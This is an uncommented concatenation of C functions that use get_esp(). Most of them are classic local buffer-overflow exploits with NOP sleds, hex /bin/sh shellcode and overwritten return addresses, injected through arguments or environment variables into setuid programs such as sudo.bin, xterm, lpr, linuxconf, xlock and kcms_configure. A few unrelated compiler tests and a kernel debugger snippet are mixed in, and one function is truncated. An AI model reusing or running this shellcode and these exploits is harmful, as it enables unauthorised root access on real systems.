void main(int argc,char **argv) { FILE *fp; long magic,magicret; char buf[100],*envi; int i; envi = (char *) malloc(1000*sizeof(char)); memset(envi,0x90,1000); memcpy(envi,"SOR=",4); memcpy(envi+980-strlen(shell),shell,strlen(shell)); envi[1000]=0; putenv(envi); if (argc!=3) { magicret = get_esp()+116; magic = get_esp()-1668; } else { magicret = get_esp()+atoi(argv[1]); magic = get_esp()+atoi(argv[2]); } memset(buf,0x41,100); buf[99]=0; memcpy(buf+91,&magic,4); for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4); execl("/usr/bin/write","write","root",buf,(char *)0); }
int main() { S s; s.a = 1; void *esp_before = get_esp(); foo(s); CHECK_EQ(esp_before, get_esp()); }
int main() { void *esp_before = get_esp(); S s; Z z; z.foo(s); CHECK_EQ(esp_before, get_esp()); }
int main() { void *old_esp = get_esp(); Child c; CHECK_EQ(old_esp, get_esp()); CHECK_EQ(1, base_ctor_calls); CHECK_EQ(1, middle_ctor_calls); CHECK_EQ(1, child_ctor_calls); }
int main() { void *old_esp; Child *c = new Child; old_esp = get_esp(); destroy(c); CHECK_EQ(old_esp, get_esp()); CHECK_EQ(1, base_left_dtor_calls); CHECK_EQ(1, base_right_dtor_calls); CHECK_EQ(1, child_dtor_calls); CHECK_EQ(1, operator_delete_calls); }
void main (int argc, char *argv[]) { int i; if (argc > 1) offset = strtol(argv[1], NULL, 0); if (argc > 2) nop = strtoul(argv[2], NULL, 0); else nop = 285; esp = get_esp(); memset(buf, NOP, BUFLEN); memcpy(buf+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < BUFLEN-4; i += 4) *((int *) &buf[i]) = esp+offset; printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n", esp+offset, esp, offset, nop); execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-P", buf, "foofoo", NULL); printf("exec failed!\n"); return; }
int main (int argc, char *argv[]) { long offset=410; int nop=64; int gab=40; long addr; char buffer[210]; int i, a, b; if (argc > 1) offset = strtol(argv[1], NULL, 0); if (argc > 2) gab = strtol(argv[2], NULL, 0); if (argc > 3) nop = strtol(argv[2], NULL, 0); for (a = 0; a <gab; a++) buffer[a] = 'A'; addr = get_esp() + offset; buffer[a++] = addr & 0x000000ff; buffer[a++] = (addr & 0x0000ff00) >> 8; buffer[a++] = (addr & 0x00ff0000) >> 16; buffer[a++] = (addr & 0xff000000) >> 24; for ( ; a < nop; a++) buffer[a] = 0x90; for (b = 0; b < strlen(shellcode); b++, a++) buffer[a] = shellcode[b]; buffer[strlen(buffer)] = '\0'; printf("addr = 0x%x\n", addr); execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL); }
void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); }
int main(int ac, char **av) { char shell[]= "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53" "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff"; unsigned long magic = get_esp() + 1180; /* default offset */ unsigned char buf[800]; char *env; env = (char *) malloc(400*sizeof(char)); memset(env,0x90,400); memcpy(env+160,shell,strlen(shell)); memcpy(env,"SOR=",4); buf[399]=0; putenv(env); memset(buf,0x41,800); memcpy(buf+271,&magic,4); memcpy(buf,"CFTIME=",7); buf[799]=0; putenv(buf); system("/usr/sbin/i86/whodo"); }
int main() { char *buff, *ptr, *egg; long *addr_ptr, addr; int bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; addr = get_esp(); buff = malloc(bsize); egg = malloc(eggsize); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); system("/usr/local/bin/abuse.sdl -datadir $RET"); }
int main(int ac, char **av) { char shell[]= "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05" "\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2" "\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff" "\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14" "\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18" "\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02" "\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; unsigned long magic = get_esp() + 0x50; /* default offset */ unsigned char buf[600]; symlink("/bin/ksh","/tmp/xx"); memset(buf,0x90,600); buf[599]=0; memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell)); memcpy(buf,"HOME=",5); memcpy(buf+265,&magic,4); putenv(buf); system("/usr/bin/tip 5"); unlink("/tmp/xx"); }
void dump_stack() { int a = 0xaabbccdd; int i = 0; int *beg; beg = &a+128; printf("stack--> esp:0x%x ebp:0x%x &a:0x%x:%d &i:0x%x:%d &beg:0x%x 0x%x\n", get_esp(),get_ebp(),&a,a,&i,i,&beg,beg); for(i = 0; i < 128+64; i+=4) { printf("0x%x: %08x %08x %08x %08x\n",(int)(beg-i), *(beg-i),*(beg-i-1),*(beg-i-2),*(beg-i-3)); } printf("stack--> esp:0x%x ebp:0x%x &a:0x%x:%d &i:0x%x:%d\n",get_esp(),get_ebp(),&a,a,&i,i); }
void active (int idx,int value) { int flag=0x33333333; int a = 0x44444444; printf("active--> esp1:0x%x ebp1:0x%x &flag:0x%x\n",get_esp(),get_ebp(),&flag); dump_stack(); //fflush(); *(&a+idx) = value; }
int main(int argc, char *argv[]) { char buff[BUFSIZE]; int nopcount=501, offset=260; int i; if (argc > 1) offset = atoi(argv[1]); if (argc > 2) nopcount = atoi(argv[2]); memset (buff, 0x90, BUFSIZE); for (i = nopcount; i < BUFSIZE - 4; i += 4) *(long *) &buff[i] = get_esp() + offset; memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen (shellcode)); memcpy (buff, ":", 1); printf("Addr = 0x%x\n", get_esp() + offset); execl("/usr/bin/lp", "lp", "-d", buff, "-p", "/tmp/ps_data",NULL);
int main(int argc,char *argv[]) { int flag1=0x11111111; int idx,value; int flag2=0x22222222; printf("main--> esp1:0x%x ebp1:0x%x &flag1:0x%x &flag2:0x%x\n", get_esp(),get_ebp(),&flag1,&flag2); if(argc != 3){ printf("Usage: %s idx value\n",argv[0]); return -1; } idx = atoi(argv[1]); value = atoi(argv[2]); printf("main--> idx:%d value:0x%x\n",idx,value); printf("main--> esp2:0x%x ebp2:0x%x\n",get_esp(),get_ebp()); active(idx,value); return 0; }
int main(int argc, char *argv[]) { int esp=get_esp(); int i,j; char b[LEN]; memset(b,0x90,LEN); memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode)); *(int *)&b[RET_OFFSET]=esp+JMP_OFFSET; b[RET_OFFSET+4]=0; execlp("ksu","ksu","-n",b,NULL); }
main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE; if(argc>1) ofs=atoi(argv[1]); if(argc>2) bs=atoi(argv[2]); printf("Using offset of esp + %d (%x)\nBuffer size %d\n", ofs, get_esp()+ofs, bs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, bs-strlen(execshell)); ptr += bs-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL); }
void main(int argc, char **argv) { FILE * pi; char *buf,*p; unsigned long *adr; int i,off; if(argc < 2) { puts("usage, testsyscallexploit \"path_to_testsyscall\" \"optional_offset\""); exit(-1); } if (argc>2) off=atoi(argv[2]); else off=4; printf("using buffer delta:%d\n",off); if((p = buf = malloc(2268+28+off))==NULL) exit(-1); memset(p, 0x90, 2268+off); p += 2268+off - strlen(shellcode); for(i = 0; i < strlen(shellcode); i++) *p++ = shellcode[i]; adr = (long *)p; for(i = 0; i < 7; i++) *adr++ = get_esp(); p = (char *)adr; *p = 0; pi = popen(argv[1], "w"); if(pi == NULL) { perror("popen"); exit(-1); } *p = '\n'; *(p+1) = '\0'; if(fwrite(buf, strlen(buf), 1, pi)<0) { perror("fwrite"); exit(-1); } //execl(argv[1], argv[1],buf, NULL); }
static int db_esp(struct db_variable *vp, db_expr_t *valuep, int op) { if (kdb_frame == NULL) return (0); if (op == DB_VAR_GET) *valuep = get_esp(kdb_frame); else if (ISPL(kdb_frame->tf_cs)) kdb_frame->tf_esp = *valuep; return (1); }
void main(int argc, char *argv[]) { char *buffer, *ptr, *egg; long *address_p, addr; int offset= DEFAULT_OFFSET, bsize= BUFFER_SIZE; int i, egg_size= EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) egg_size = atoi(argv[3]); if (!(buffer = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(egg_size))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buffer; address_p = (long *) (ptr+ALIGN); for (i = 0; i < bsize; i+=4) *(address_p++) = addr; ptr = egg; for (i = 0; i < egg_size - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buffer[bsize - 1] = '\0'; // '\0' or else there wil be trouble egg[egg_size - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); // put our made egg in the env memcpy(buffer,"HOME=",5); putenv(buffer); // put our prepared buffer in env execlp(BINARY,BINARY,0); // execute it }
int main(int argc,char *argv[]){ char buff[BUFFER]; int x,offset=0; long address; if(argc>1) offset=atoi(argv[1]); address = get_esp() + offset; fprintf(stderr,"Address: 0x%lx\nOffset: %d\nShellSize: %d\n",address,offset,strlen(shellcode)); for(x=3;x<BUFFER;x+=4) *(int *)&buff[x]=address; for(x=0;x<(BUFFER-strlen(shellcode));x++) buff[x]=NOP; memcpy(buff+(BUFFER-strlen(shellcode)),shellcode,strlen(shellcode)); setenv("SHELL",buff,1); if((execl(PATH,"elm",0)) < 0) fprintf(stderr,"Kurwa Mac! No %s file ?\n",PATH); return 0; }
int main (int argc, char *argv[]) { int i; if (argc > 1) offset = strtol(argv[1], NULL, 0); else offset = -200; esp = get_esp(); memset(buf, 0x90, BUFLEN); memcpy(buf+800, eyecode, strlen(eyecode)); *((int *) &buf[1037]) = esp+offset; strncpy(&buf[0],"HOME=",5); putenv(buf); execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL); return; }
int main() { strcpy(s,"HOME="); s1=s+5; while(s1<s+260+5-strlen(shellcode)) *(s1++)=NOP; while(*shellcode) *(s1++)=*(shellcode++); *((unsigned long *)s1)=get_esp()-OFS; printf("Jump to: %p\n",*((long *)s1)); s1+=4; *s1=0; putenv(s); system("bash"); }
main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE, align=DEFAULT_ALIGN; if (argc>1) bsize=atoi(argv[1]); if (argc>2) offset=atoi(argv[2]); if (argc>3) eggsize=atoi(argv[3]); if (argc>4) align=atoi(argv[4]); if (!(buff=malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg=malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr=get_esp()-offset; printf("Using address: 0x%x\n",addr); ptr=buff; addr_ptr=(long *)(ptr+align); for (i=0; i<bsize; i+=4) *(addr_ptr++)=addr; ptr=egg; for (i=0; i<eggsize-strlen(shellcode)-1; i++) *(ptr++)=NOP; for (i=0; i<strlen(shellcode); i++) *(ptr++)=shellcode[i]; buff[bsize-1]='\0'; egg[eggsize-1]='\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"LINUXCONF_LANG=",15); putenv(buff); execl("/sbin/linuxconf","linuxconf",NULL); }
int main (int argc, char *argv[]) { int i; if (argc > 1) offset = strtol(argv[1], NULL, 0); else offset = -300; nop = 600; esp = get_esp(); memset(buf, 0x90, BUFLEN); memcpy(buf+600, shell, strlen(shell)); for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4) *((int *) &buf[i]) = esp+offset; buf[BUFLEN-1] = '\0'; execl("/usr/openwin/bin/kcms_configure", "eEye", "-o","-S","X",buf,NULL); return; }
main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; printf("SUDO.BIN exploit coded by _PHANTOM_ 1997\n"); setenv("NLSPATH",buff,1); execl(PATH_SUDO, "sudo.bin","bash", NULL); }
int main (int argc, char *argv[]) { register int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); esp = get_esp(); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; printf("jmp = [0x%x]\toffset = [%d]\n",esp+offset,offset); execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL); printf("exec failed!\n"); return 0; }
int main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); printf("buff %x, egg %x\n", buff, egg); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for(i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for(i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); execl("/home/level11/attackme", "attackme", buff, 0); }
int main(int ac, char **av) { char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff" "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46" "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0" "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52" "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff" "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08" "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b" "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8" "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\xff\xff\xff\xff\xff\xff\xff" "\xff\xff"; unsigned long magic = 0x8047b78; unsigned long r = get_esp() + 600; unsigned char buf[300]; int f; if (ac == 2) r += atoi(av[1]); memset(buf,0x61,sizeof(buf)); memcpy(buf+52,&magic,4); memcpy(buf+76,&r,4); f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600); write(f,"1 2 3 4 ",8); write(f,buf,sizeof(buf)); close(f); memset(buf,0x90,sizeof(buf)); memcpy(buf,"LOL=",4); memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell)); putenv(buf); system("/usr/sbin/arp -f /tmp/ypx"); unlink("/tmp/ypx"); }
int getEnvAddr(const char* envPtr) { int envAddr = NULL; int retCode = 0; char* charPtr = (char *) get_esp(); /* Search for the starting address of the environment string for */ /* the specified environment variable */ while((unsigned int) charPtr < (unsigned int) USER_UPPER_MAGIC) { retCode = memcmp((unsigned char *) charPtr++, envPtr, 4); /* Found */ if(retCode == 0) { envAddr = (int) (charPtr - 1); break; } } return envAddr; }